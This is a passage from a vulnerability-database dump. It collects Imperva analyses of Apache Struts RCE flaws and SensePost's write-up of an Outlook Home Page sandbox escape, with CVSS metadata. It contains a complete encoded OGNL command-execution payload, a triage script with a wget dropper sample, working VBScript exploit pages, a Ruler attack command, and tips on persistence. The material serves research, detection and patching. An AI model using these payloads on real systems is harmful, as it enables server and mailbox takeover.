**%7b%28%23szgx%3d%27multipart%2fform-data%27%29.%28%23dm%3d%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS%29.%28%23_memberAccess%3f%28%23_memberAccess%3d%23dm%29%3a%28%28%23container%3d%23context%5b%27com.opensymphony.xwork2.ActionContext.container%27%5d%29.%28%23ognlUtil%3d%23container.getInstance%28%40com.opensymphony.xwork2.ognl.OgnlUtil%40class%29%29.%28%23ognlUtil.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ognlUtil.getExcludedClasses%28%29.clear%28%29%29.%28%23context.setMemberAccess%28%23dm%29%29%29%29.%28%23cmd%3d%27echo%20891549112%27%29.%28%23iswin%3d%28%40java.lang.System%40getProperty%28%27os.name%27%29.toLowerCase%28%29.contains%28%27win%27%29%29%29.%28%23cmds%3d%28%23iswin%3f%7b%27cmd.exe%27%2c%27%2fc%27%2c%23cmd%7d%3a%7b%27%2fbin%2fbash%27%2c%27-c%27%2c%23cmd%7d%29%29.%28%23p%3dnew%20java.lang.ProcessBuilder%28%23cmds%29%29.%28%23p.redirectErrorStream%28true%29%29.%28%23process%3d%23p.start%28%29%29.%28%23ros%3d%28%40org.apache.struts2.ServletActionContext%40getResponse%28%29.getOutputStream%28%29%29%29.%28%40org.apache.commons.io.IOUtils%40copy%28%23process.getInputStream%28%29%2c%23ros%29%29.%28%23ros.close%28%29%29%7d** \n**URL:** | /struts2-showcase/integration/savegangster.action \n \nDecoding the URL\u2019s payload injected to the name parameter unveils the following RCE (see Figure 6):\n\n\n\n_Figure 6: OGNL-based RCE (URL Decoded)_\n\nThe payload in this case refers to an attempt to execute OGNL expression, as an entry point to the attack. 
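Both payloads above can be decoded and triaged mechanically. The following Python is an added example, not code from the Imperva post or from any Imperva product: it percent-decodes a request body, checks for the OGNL markers the two payloads share, and classifies the request as a header-insertion probe (payload #1), an echo canary (payload #2) or a real command-execution attempt. The sample requests, the `203.0.113.5` dropper address and the trimmed OGNL chain in `OGNL_HEAD`/`OGNL_TAIL` are constructed for the example; the Showcase path and the two payload shapes are the ones shown above.

```python
"""Decode and triage Struts S2-048 (CVE-2017-9791) style request bodies.

Added example, not code from the Imperva post. It reproduces the two payload
shapes shown above (custom-header probe, OGNL command chain) and sorts each
request into recon versus exploitation. Every sample request is constructed.
"""
import re
from urllib.parse import quote, unquote_plus

# The S2-048 sink is an error message, so attackers wrap the expression in
# ${...} / %{...} or submit a bare {(...)} chain of OGNL assignments.
OGNL_WRAPPERS = re.compile(r"\$\{|%\{|\{\s*\(")
OGNL_MARKERS = ("#_memberAccess", "@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS",
                "com.opensymphony.xwork2", "java.lang.ProcessBuilder",
                "@java.lang.Runtime@getRuntime", ".addHeader(")
# Vulnerable Showcase entry point; compared case-insensitively because the
# blocked requests used "savegangster.action".
VULN_PATH = "/struts2-showcase/integration/savegangster.action"
CMD_RE = re.compile(r"#cmd\s*=\s*'([^']*)'")
HEADER_RE = re.compile(r"addHeader\('([^']*)'\s*,\s*'([^']*)'")


def decode_body(body: str) -> str:
    """Percent-decode until stable (bounded): scanners sometimes double-encode."""
    cur = body
    for _ in range(3):
        nxt = unquote_plus(cur)
        if nxt == cur:
            break
        cur = nxt
    return cur


def classify(request: dict) -> dict:
    """Triage one request given as {'url': ..., 'body': ...}."""
    decoded = decode_body(request.get("body", ""))
    markers = [m for m in OGNL_MARKERS if m in decoded]
    verdict = {
        "path_match": request.get("url", "").lower().startswith(VULN_PATH),
        "ognl": bool(markers) and OGNL_WRAPPERS.search(decoded) is not None,
        "markers": markers,
        "kind": "benign",
        "command": None,
        "header": None,
    }
    if not verdict["ognl"]:
        return verdict
    hdr = HEADER_RE.search(decoded)
    if hdr:
        # Payload #1 shape: plant a response header to prove OGNL is
        # evaluated; cheap for a scanner to check, no shell involved yet.
        verdict["header"] = (hdr.group(1), hdr.group(2))
        verdict["kind"] = "recon-header"
        return verdict
    cmd = CMD_RE.search(decoded)
    if cmd:
        verdict["command"] = cmd.group(1)
        # Payload #2 shape: "echo <number>" is a canary the scanner greps for
        # in the response; any other command counts as real exploitation.
        canary = re.fullmatch(r"echo\s+\d+", cmd.group(1).strip())
        verdict["kind"] = "recon-echo" if canary else "exploit"
        return verdict
    verdict["kind"] = "exploit"  # OGNL present but not one of the known shapes
    return verdict


# Decoded OGNL chain modelled on the post's second payload (trimmed); the
# shell command is spliced in so the recon and exploit samples share one body.
OGNL_HEAD = ("{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)"
             ".(#_memberAccess?(#_memberAccess=#dm):(#context.setMemberAccess(#dm)))"
             ".(#cmd='")
OGNL_TAIL = ("').(#cmds={'/bin/bash','-c',#cmd})"
             ".(#p=new java.lang.ProcessBuilder(#cmds)).(#process=#p.start())}")


def ognl_body(cmd: str) -> str:
    """Percent-encode the chain the way the blocked request carried it."""
    return "name=" + quote(OGNL_HEAD + cmd + OGNL_TAIL, safe="")


PATH = "/struts2-showcase/integration/saveGangster.action"
SAMPLES = {  # constructed; 203.0.113.5 is a documentation-only address
    "header_probe": {"url": PATH, "body":
        "name=${#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse']"
        ".addHeader('X-BIGSCAN-Test','fe9a40f002fe11e7b4ef0242c0a8050')}"},
    "echo_probe": {"url": PATH, "body": ognl_body("echo 891549112")},
    "dropper": {"url": PATH, "body": ognl_body("wget http://203.0.113.5/x.sh -O /tmp/x.sh")},
    "legit": {"url": PATH, "body": "name=Tony&age=30&description=hello+world"},
}


def triage_all() -> dict:
    """Sample name -> verdict kind."""
    return {name: classify(req)["kind"] for name, req in SAMPLES.items()}
```

`triage_all()` returns `recon-header`, `recon-echo`, `exploit` and `benign` for the four samples. The canary rule (`echo` followed by digits) is deliberately narrow: anything else that reaches `ProcessBuilder` is reported as exploitation, and it is worth alerting on that even when `path_match` is false, because the same OGNL chain is reused against other Struts entry points.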
Again, in this case it is only a reconnaissance attempt before the attack, in which the attacker echoed a randomly generated number (\u201c891549112\u201d, the value assigned to #cmd in the payload above) and then looked for it in the response to confirm that the command ran.\n\nIt will be interesting to monitor the trending exploits over time and to see if and how the reconnaissance trend gradually shifts to actual exploitation attempts against these servers.\n\n## Stay Protected\n\nBased on the official [advisory](<http://seclists.org/oss-sec/2017/q3/92>), this vulnerability does not affect applications on the Struts 2.5.x series or applications that do not use the Struts 1 plugin, so an update is required for those on the earlier, vulnerable versions. The advisory also notes that an application can keep the Struts 1 plugin and still be safe as long as user-controlled values are never passed raw into ActionMessage.\n\nAn alternative to applying the formal advisory, which can be costly and time consuming, is [virtual patching](<https://www.owasp.org/index.php/Virtual_Patching_Best_Practices>). Instead of leaving a web application exposed to attack while attempting to modify code after discovering a vulnerability, virtual patching actively protects web apps from attacks, reducing the window of exposure and decreasing the cost of emergency fix cycles until you\u2019re able to patch them.\n\nIn addition to virtual patching, zero-day detection mechanisms such as those mentioned above protect sites by detecting and blocking new strains of an attack before a dedicated signature for it is released, without any modification to the protected systems.\n\nLearn more about protecting web applications from vulnerabilities using [Imperva Incapsula WAF](<https://www.incapsula.com/website-security/web-application-firewall.html>) or [Imperva SecureSphere WAF](<https://www.imperva.com/Products/WebApplicationFirewall-WAF>).\n\n[1] <https://cwiki.apache.org/confluence/display/WW/S2-048>\n\n[2] <https://www.imperva.com/blog/2017/01/remote-code-execution-rce-attacks-apache-struts/>", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": 
{"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 6.0}, "published": "2017-07-13T19:12:31", "title": "CVE-2017-9791: Analysis of RCE in the Struts Showcase App in Struts 1 Plugin", "type": "impervablog", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-9791", "CVE-2017-5638"], "modified": "2017-07-13T19:12:31", "href": "https://www.imperva.com/blog/2017/07/cve-2017-9791-rce-in-struts-showcase-app-in-struts-1-plugin/", "id": "IMPERVABLOG:DA39045C8E700086C560AAFFDBA589A6", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-09-09T07:20:50", "description": "Just two months ago we [published an analysis](<https://www.imperva.com/blog/2017/07/cve-2017-9791-rce-in-struts-showcase-app-in-struts-1-plugin/>) of a critical remote code execution (RCE) security vulnerability in Apache Struts. Now Apache Struts has published a new version fixing yet another critical RCE vulnerability (September 5, 2017).\n\n[CVE-2017-9805](<http://struts.apache.org/docs/s2-052.html>) is a vulnerability in Apache Struts related to using the Struts REST plugin with XStream handler to handle XML payloads. 
If exploited it allows a remote unauthenticated attacker to run malicious code on the application server to either take over the machine or launch further attacks from it.\n\n## Imperva Customers Protected\n\nIn addition to our zero-day protection rules that spotted this attack, we\u2019ve also published new dedicated security rules to provide maximum protection to Imperva SecureSphere and Incapsula WAF customers against this vulnerability. As of the publication date of this post, our systems have successfully blocked thousands of attacks from all over the world (see \"In the Wild\" section below).\n\n## Multiple Apache Struts Vulnerabilities in 2017\n\nAs mentioned above, this isn\u2019t the first time such a critical vulnerability has been found in Apache Struts. In fact, we\u2019ve seen an increasing amount of them in the Struts platform as several other RCE vulnerabilities have already been discovered since the beginning of 2017. The CVEs are summarized below.\n\n**Date** | **CVSS** | **Vulnerability** | **CVE** \n---|---|---|--- \n9/7/2017 | 9.3 | Apache Struts views/freemarker/FreemarkerManager.java Freemarker Tag Handling Remote Code Execution | 2017-12611 \n9/5/2017 | 10 | Apache Struts REST Plugin XStream XML Request Deserialization Remote Code Execution | 2017-9805 \n7/11/2017 | 5 | Apache Struts URL Validator Regular Expression URL Handling Remote DoS | 2017-7672, 2017-9804 \n7/11/2017 | 6.8 | Apache Struts Spring AOP Functionality Unspecified Remote DoS | 2017-9787 \n7/7/2017 | 10 | Apache Struts 1 Plugin for Struts 2 ActionMessage Class Error Message Input Handling Remote Code Execution | 2017-9791 \n3/6/2017 | 10 | Apache Struts Jakarta Multipart Parser File Upload Multiple Content Value Handling Remote Code Execution (Struts-Shock) | 2017-5638 \n \n## About the CVE-2017-9805 Vulnerability\n\nApache Struts contains a flaw in the REST Plugin XStream that is triggered as the program insecurely deserializes user-supplied input in XML requests. 
More specifically, the problem occurs in XStreamHandler\u2019s toObject () method, which does not impose any restrictions on the incoming value when using XStream deserialization into an object, resulting in arbitrary code execution vulnerabilities. More information about the vulnerability can be found [here](<https://lgtm.com/blog/apache_struts_CVE-2017-9805>).\n\n## In the Wild\n\nTo date, our systems have successfully blocked thousands of attacks from all over the world with China, as usual in Apache Struts vulnerabilities, identified as the most prominent source of attacks (see Figure 1).\n\n[](<https://www.imperva.com/blog/wp-content/uploads/2017/09/Distribution-of-CVE-2017-9805-attacks-WW-1-2.png>)\n\n_Figure 1: Geo-distribution of CVE-2017-9805 attacks_\n\nIt is interesting to note that a single Chinese IP is responsible for more than 40% of the attack attempts that we registered. According to [Shodan](<https://www.shodan.io/>), this IP is registered to a large Chinese e-commerce company and runs an open SSH server which may indicate that this is a compromised machine. This machine tried to attack dozens of sites with different automated tools impersonating legitimate browsers such as cURL, wget, and Python-requests indicating the persistency of the attacker(s). [Unlike past vulnerabilities](<https://www.imperva.com/blog/2017/07/cve-2017-9791-rce-in-struts-showcase-app-in-struts-1-plugin/>), most of the attempted attacks (~80%) refer to exploitation attempts and only 20% refer to reconnaissance attempts to track vulnerable servers (see Figure 2). 
Exploitation attempts involved running operating system commands such as shell, wget, or cURL in order to download a malicious payload and take over the server to mount further attacks, usually [DDoS](<https://www.imperva.com/app-security/threatglossary/ddos-attacks/>), as part of a larger botnet.\n\n[](<https://www.imperva.com/blog/wp-content/uploads/2017/09/CVE-2017-9805-payload-by-percentage-2.jpg>)\n\n_Figure 2: Percentage of payload types of CVE-2017-9805 attack attempts_\n\n## Stay Protected with Virtual Patching\n\nBased on the official [advisory](<http://struts.apache.org/docs/s2-052.html>), this vulnerability affects applications using Struts 2.5 through Struts 2.5.12. There is no known workaround, meaning that an update is required for those who use these versions. It is also mentioned that backward compatibility is not ensured and that some REST actions stop working.\n\nAn immediate security measure organizations can use to protect against these types of vulnerabilities is virtual patching. Instead of leaving a web application exposed to attack while attempting to modify the code after discovering a vulnerability, virtual patching actively protects web apps from attacks, reducing the window of exposure and decreasing the cost of emergency fix cycles until you\u2019re able to patch them.\n\nLearn more about virtual patching and protecting web applications from vulnerabilities using [Imperva Incapsula WAF](<https://www.incapsula.com/website-security/web-application-firewall.html>) or [Imperva SecureSphere WAF](<https://www.imperva.com/Products/WebApplicationFirewall-WAF>).", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", 
"version": "3.1"}, "impactScore": 5.9}, "published": "2017-09-08T16:10:08", "title": "CVE-2017-9805: Analysis of Apache Struts RCE Vulnerability in REST Plugin", "type": "impervablog", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-9791", "CVE-2017-9805"], "modified": "2017-09-08T16:10:08", "id": "IMPERVABLOG:D4ED0576717DBEEDCF6B9B98BADC92BD", "href": "https://www.imperva.com/blog/2017/09/cve-2017-9805-analysis-of-apache-struts-rce-vulnerability-in-rest-plugin/", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "seebug": [{"lastseen": "2017-11-19T11:56:48", "description": "[Ruler](https://github.com/sensepost/ruler) has become a go to tool for us on external engagements, easily turning compromised mailbox credentials into shells. This has resulted in security being pushed forward and Microsoft responding with patches for the two vectors used in Ruler, namely rules and forms. These were patched with [KB3191938](https://support.microsoft.com/en-us/help/3191938/descriptionofthesecurityupdateforoutlook2013june13-2017) and [KB4011091](https://support.office.com/en-us/article/Custom-form-script-is-now-disabled-by-default-bd8ea308-733f-4728-bfcc-d7cce0120e94) respectively. \r\n\r\nThis puts us back into the cat and mouse game of attack versus defence, with attack needing to find a new vector. Turns out the rules of three holds true, and where two vulnerabilities lurk, a third surely exists.\r\n\r\ntl;dr There is a new attack built into Ruler. 
New version of Ruler: https://github.com/sensepost/ruler\r\n\r\nBut you need to read this post to get the exploit ;)\r\n\r\n### The Home Page\r\n\r\n\r\nWhile searching for a new code execution vector, we came across the Outlook Home Page, a legacy feature not many use or are aware of. The homepage allows you to customise the default view for any folder in Outlook. This allows specifying a URL to be loaded and displayed whenever a folder is opened. This URL has to be either HTTP or HTTPS and can be either an internal or external network location.\r\n\r\n\r\n\r\nThe home page can be set through the Outlook GUI\r\n\r\nWhen Outlook loads the remote URL, it will render the contents using ieframe.dll, which means we have numerous options available to us for customising the page. The one thing you want from an Outlook Home Page is the ability to include actual Outlook content into the page. To do this, the Outlook ActiveX controls can be used.\r\n\r\nA simple Outlook Home Page, which will display the message \u201cHello Alex\u201d and then display the contents of the folder would look as follows:\r\n```\r\n<html>\r\n<head>\r\n<meta http-equiv=\"Content-Language\" content=\"en-us\">\r\n<meta http-equiv=\"Content-Type\" content=\"text/html; charset=windows-1252\">\r\n<title>Outlook</title>\r\n</head>\r\n<body>\r\n<h1>Hello Alex</h1>\r\n <object classid=\"clsid:0006F063-0000-0000-C000-000000000046\" id=\"ViewCtl1\" data=\"\" width=\"100%\" height=\"100%\"></object>\r\n</body>\r\n</html>\r\n```\r\n\r\nThe magic source being the OutlookViewCtl CLSID embedded as an Object;\r\n```\r\n<object classid=\"clsid:0006F063-0000-0000-C000-000000000046\" id=\"ViewCtl1\" data=\"\" width=\"100%\" height=\"100%\"></object>\r\n```\r\n\r\nAt this point we have a nice home page to display whenever we log into Outlook and we get greeted by name, great.\r\n\r\n### ActiveX Fun\r\n\r\n\r\nSince we have ActiveX controls and our page is hosted in an ieframe, it stands to reason that we should be 
able to include some vbscript/jscript to interact with the ActiveX control. And it turns out we can.\r\n\r\nThe first thing we did was try to skip straight to command execution, in case this ieframe isn\u2019t constrained by the usual security zones and other protections.\r\n```\r\n<html>\r\n<head>\r\n<meta http-equiv=\"Content-Language\" content=\"en-us\">\r\n<meta http-equiv=\"Content-Type\" content=\"text/html; charset=windows-1252\">\r\n<title>Outlook</title>\r\n<script id=clientEventHandlersVBS language=vbscript>\r\n<!--\r\n Sub window_onload()\r\n Set cmd = CreateObject(\"Wscript.Shell\")\r\n cmd.Run(\"notepad\")\r\n End Sub\r\n-->\r\n</script>\r\n</head>\r\n<body>\r\n<h1>Hello Alex</h1>\r\n <object classid=\"clsid:0006F063-0000-0000-C000-000000000046\" id=\"ViewCtl1\" data=\"\" width=\"100%\" height=\"100%\"></object>\r\n</body>\r\n</html>\r\n```\r\nWe\u2019ve simply created a window_onload function, which will execute as the page loads, and tasked it to create a new object of type Wscript.Shell and then to execute the notepad application.\r\n\r\nUnfortunately this fails. The ieframe is loaded with the typical Internet Explorer security zones, and certain \u201cdangerous\u201d objects can\u2019t be created. Any attempts to access objects such as Wscript.Shell, Scripting.FileSystemObject and others will result in an error and our script will stop executing. Essentially, the only objects we can interact with are ones that pertain directly to Outlook.\r\n\r\n\r\n\r\nAccess is denied when trying to create blacklisted objects\r\n\r\nAt this point we went down a long rabbit hole of trying to get around this limitation by exploring the objects that are accessible. One of those was MSXML2.DOMDocument, and here we tried to use some XSL transforms to get code execution; however, this also failed with the same message, \u201cActiveX component can\u2019t create object\u201d. 
As it turns out, the sandboxing applies to all scripting inside the ieframe, no matter how many objects down you go.\r\n\r\nNot wanting to give up, we revisited what we knew. We had ActiveX, we had custom vbscript and we could interact with certain ActiveX controls, Outlook specific controls being one subset of those. This means we are able to directly interact with the ActiveX control already embedded into the page. This is simply done by directly referencing the Object:\r\n```\r\nSet Application = ViewCtl1\r\n```\r\n\r\nNow that we have a \u201chandle\u201d to the ActiveX control, we can make use of functions and access objects belonging to that control. Here [MSDN](https://msdn.microsoft.com/en-us/vba/outlook-vba/articles/viewctl-object-outlook-view-control) comes in handy; remember, documentation is your friend. Consulting the MSDN docs, we find the OutlookApplication property, which according to the documentation \u201cReturns an object that represents the container object for the control.\u201d We can then access this with:\r\n```\r\nSet Application = ViewCtl1.OutlookApplication\r\n```\r\nWe now have a \u201chandle\u201d to the Application object for Outlook, and again we need to find what objects and methods are available to us. Back to MSDN.\r\n\r\nOne of the available methods is the CreateObject method. This method allows us to create an automation object of a specific class, just like the CreateObject usually used directly in VBScript.\r\n```\r\n Set Application = ViewCtl1.OutlookApplication\r\n Set cmd = Application.CreateObject(\"Wscript.Shell\")\r\n cmd.Run(\"notepad\")\r\n```\r\n\r\nAnd this worked, suddenly notepad popped up on the screen. It turns out that we now have a handle into an object outside of the ieframe sandbox. So we are back in the land of unrestricted vbscript. 
At this point exploitation becomes relatively trivial.\r\n\r\nOur new home page can now be defined as:\r\n```\r\n<html>\r\n<head>\r\n<meta http-equiv=\"Content-Language\" content=\"en-us\">\r\n<meta http-equiv=\"Content-Type\" content=\"text/html; charset=windows-1252\">\r\n<title>Outlook</title>\r\n<script id=clientEventHandlersVBS language=vbscript>\r\n<!--\r\n Sub window_onload()\r\n Set Application = ViewCtl1.OutlookApplication\r\n Set cmd = Application.CreateObject(\"Wscript.Shell\")\r\n cmd.Run(\"notepad\")\r\n End Sub\r\n-->\r\n\r\n</script>\r\n</head>\r\n\r\n<body>\r\n <h1> Hello Alex </h1>\r\n <object classid=\"clsid:0006F063-0000-0000-C000-000000000046\" id=\"ViewCtl1\" data=\"\" width=\"100%\" height=\"100%\"></object>\r\n</body>\r\n</html>\r\n```\r\n\r\nI reported this escape from the sandbox to MSFT and it was assigned [CVE-2017-11774](https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2017-11774) and patched in the October updates.\r\n\r\nAnother thing about bug hunting, if you\u2019ve thought of it, so has someone else. And just like Outlook forms, it turns out someone else was doing the same research. Again Nick Landers ([@monoxgas](https://twitter.com/monoxgas)) came across the same issue a little while after me, and pointed out a slightly different version of the attack; he made use of window.external to get a handle to the OutlookApplication, rather than using the ActiveX Outlook viewctrl. This still works, as OutlookApplication has been whitelisted for use in the ieframe.\r\n```\r\nSub window_onload()\r\n Set oApp = window.external.OutlookApplication\r\n Set s = oApp.CreateObject(\"Wscript.Shell\")\r\n s.Run(\"notepad\")\r\n End Sub\r\n```\r\n \r\n\r\n### Remote Exploit\r\n\r\n\r\nThis was great, a third method for getting code exec in Outlook. The only problem at this point was that it was still manual. 
How to turn this into an attack that can be conducted easily through Ruler?\r\n\r\nThis meant we had to go back to our trusted [MFCMapi](https://mfcmapi.codeplex.com/) and find where the home page value is stored and if this is synchronised through Exchange. Since we set the home page on the inbox, the properties of this folder were the obvious place to look for any changes.\r\n\r\n\r\n\r\nThe homepage is stored in the PR_FOLDER_WEBVIEWINFO property\r\n\r\nThe home page is stored in the PR_FOLDER_WEBVIEWINFO property (http://schemas.microsoft.com/mapi/proptag/0x36DF0102) which is an undocumented binary structure. Fortunately, the creators of MFCMapi had reversed this structure and MFCMapi translated the various fields for us.\r\n\r\n\r\n\r\nMFCMapi smartview decodes the binary object for us\r\n\r\nAt this point we had all the information required to add this to Ruler. Since Ruler already has all the MAPI functions required to open a folder, set the properties on a folder and then synchronise these, it took about 30 minutes to add the attack. Not too bad.\r\n\r\nThe main technical part was simply issuing a \u201cSetProperties\u201d request with the PR_FOLDER_WEBVIEWINFO property modified to point to our custom URL.\r\n\r\n### Ruler Homepage\r\n\r\n\r\nThe new version of Ruler now has homepage support, so grab the \u201c[EkoParty](https://ekoparty.org/)\u201d release from the github [releases](https://github.com/sensepost/ruler/releases) (or the [source code](https://github.com/sensepost/ruler) of course).\r\n\r\nTo use the new function couldn\u2019t be simpler. First things first, create your homepage .html page, using the example earlier in this post, you\u2019ll need to swap out \u201cnotepad\u201d for your command, so be creative. 
This needs to be hosted on a webserver; it doesn\u2019t matter where.\r\n\r\nTo set the home page via Ruler:\r\n```\r\n./ruler --email target@pew.com homepage add --url https://gist.githubusercontent.com/staaldraad/c7b857e9bd6fd332f6f1bd01a2160266/raw/16fb7bb5aac443f4541dd0557062445d128b9813/outlookHomepageRCE.html\r\n```\r\nAs simple as that. The home page can be viewed and deleted using the \u201cdisplay\u201d and \u201cdelete\u201d functions respectively, just as you would for forms or rules.\r\n\r\n\r\n\r\nAttack Attack\r\n\r\nThe [Ruler wiki](https://github.com/sensepost/ruler/wiki/Homepage) has also been updated with all the necessary bits.\r\n\r\nThe video:\r\nhttps://sensepost.com/img/pages/blog/2017/outlook-home-page-another-ruler-vector/homepage.mp4?_=1\r\n\r\n### Trigger\r\n\r\n\r\nYou might be wondering at this stage, \u201chow do I trigger my shell?\u201d, well you don\u2019t. Outlook does this for you. The home page, once set, will be triggered when the folder is refreshed. This usually happens when the user navigates out of the inbox, for example views \u201csent items\u201d and navigates back into the inbox, or when Outlook is restarted.\r\n\r\nOutlook needs to be notified that the folder has changed and needs to be refreshed. Ruler will try and force this by creating a hidden folder in the Inbox. This changes the last modified date on the folder (property changes alone don\u2019t), signalling to Outlook that a refresh is needed. When the user navigates away from the inbox and back, the home page will refresh and the exploit will trigger. This folder will be deleted when you delete the home page using Ruler.\r\n\r\nThis does have the downside of not allowing you to easily trigger the homepage straight away, but you gain a stealthy persistence method. I can also recommend you build some \u201cshell checks\u201d into your exploit, as the home page gets cached by Outlook, so the exploit may trigger even after you have unset the home page value. 
Otherwise, if you like multiple shells from a single host, leave it as is.\r\n\r\n### Defence\r\n\r\n\r\nTo defend against this you have multiple options, but the primary one is, apply the [patch (KB4011162)](https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11774). With this patch Microsoft have completely removed the \u2018home page\u2019 feature from Outlook. By killing off legacy features they are successfully reducing the attack surface and protecting end-users.\r\n\r\nGood architecture and sound security practices go a long way to preventing this, and any attack via Outlook. Ensure 2FA/MFA is deployed for user accounts and password best practices are followed. Monitoring breaches and identifying employee accounts that are present in those breaches goes a long way to making attackers lives harder. If your employees used their corporate account on a breached site, reset their password, people love reusing credentials.\r\n\r\nDetection of this attack has also been added to NotRuler and you can easily detect this with:\r\n```\r\n./notruler --mailboxes organisationList.txt --username exchadm homepage\r\n```\r\nWe wrote a [blog post detailing NotRuler](https://sensepost.com/blog/2017/notruler-turning-offence-into-defence/) a little while back. 
You can get NotRuler from: https://github.com/sensepost/notruler", "cvss3": {}, "published": "2017-10-12T00:00:00", "type": "seebug", "title": "Outlook Home Page \u2013 Another Ruler Vector", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-11774"], "modified": "2017-10-12T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-96659", "id": "SSV:96659", "sourceData": "", "sourceHref": "", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-11-19T12:02:40", "description": "In this post I'll describe how I customized a standard lgtm query to find a remote code execution vulnerability in [Apache Struts](https://struts.apache.org/). A more general announcement about this vulnerability [can be found here](https://lgtm.com/blog/apache_struts_CVE-2017-9805_announcement). It has been assigned [CVE-2017-9805](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9805), a security bulletin can be found here on the Struts website, and details of version 2.5.13 of Apache Struts that addresses this vulnerability [are available here](https://struts.apache.org/announce.html). Due to the severe nature of this vulnerability, a couple of details (including a working exploit) have been omitted from this post; this information will be added in a few weeks' time.\r\n\r\nWe strongly advise users of Struts to upgrade to the latest version to mitigate this security risk.\r\n\r\nThe vulnerability I discovered is a result of unsafe deserialization in Java. Multiple similar vulnerabilities have come to light in recent years, after Chris Frohoff and Gabriel Lawrence discovered a deserialization flaw in Apache Commons Collections that can lead to arbitrary code execution. Many Java applications have since been affected by such vulnerabilities. 
If you'd like to know more about this type of vulnerability, the lgtm documentation page on this topic is a good place to start.\r\n# Detecting unsafe deserialization in Struts #\r\n\r\nlgtm identifies alerts in code using queries written in a specially-designed language: QL. One of the many queries for Java detects potentially unsafe deserialization of user-controlled data. The query identifies situations in which unsanitized data is deserialized into a Java object. This includes data that comes from an HTTP request or from any other socket connection.\r\n\r\nThis query detects common ways through which user-controlled data flows to a deserialization method. However, some projects use a slightly different approach to receive remote user input. For example, Apache Struts uses the ContentTypeHandler interface. This converts data into Java objects. Since implementations of this interface usually deserialize the data passed to them, every class that implements this interface is potentially of interest. The standard QL query for detecting unsafe deserialization of user-controlled data can easily be adapted to recognize this additional method for processing user input. This is done by defining a custom data source.\r\n\r\nIn this case, we are interested in data flowing from the toObject method, which is defined in the ContentTypeHandler interface:\r\n\r\n void toObject(Reader in, Object target);\r\n\r\nThe data contained in the first argument in that is passed to toObject should be considered tainted: it is under the control of a remote user and should not be trusted. We want to find places where this tainted data (the source) flows into a deserialization method (a sink) without input validation or sanitization.\r\n\r\nThe QL DataFlow library provides functionality for tracking tainted data through various steps in the source code. This is known as taint tracking. 
For example, data gets tracked through various method calls:\r\n\r\n IOUtils.copy(remoteUserInput, output); // output is now also tainted because the function copy preserves the data.\r\n\r\nTo make use of the taint tracking functionality in the DataFlow library, let's define the `in` argument to ContentTypeHandler.toObject(...) as a tainted source. First, we define how the query should recognize the ContentTypeHandler interface and the method toObject.\r\n\r\n\t/** The ContentTypeHandler Java class in Struts **/\r\n\tclass ContentTypeHandler extends Interface {\r\n\t ContentTypeHandler() {\r\n\t this.hasQualifiedName(\"org.apache.struts2.rest.handler\", \"ContentTypeHandler\")\r\n\t }\r\n\t}\r\n\t\r\n\t/** The method `toObject` */\r\n\tclass ToObjectDeserializer extends Method {\r\n\t ToObjectDeserializer() {\r\n\t this.getDeclaringType().getASupertype*() instanceof ContentTypeHandler and\r\n\t this.getSignature() = \"toObject(java.io.Reader,java.lang.Object)\"\r\n\t }\r\n\t}\r\n\r\nHere we use getASupertype*() to restrict the matching to any class that has ContentTypeHandler as a supertype.\r\n\r\nNext we want to mark the first argument of the toObject method as an untrusted data source, and track that data as it flows through the code paths. To do that, we extend the FlowSource class in QL's dataflow library:\r\n\r\n\t/** Mark the first argument of `toObject` as a dataflow source **/\r\n\tclass ContentTypeHandlerInput extends FlowSource {\r\n\t ContentTypeHandlerInput() 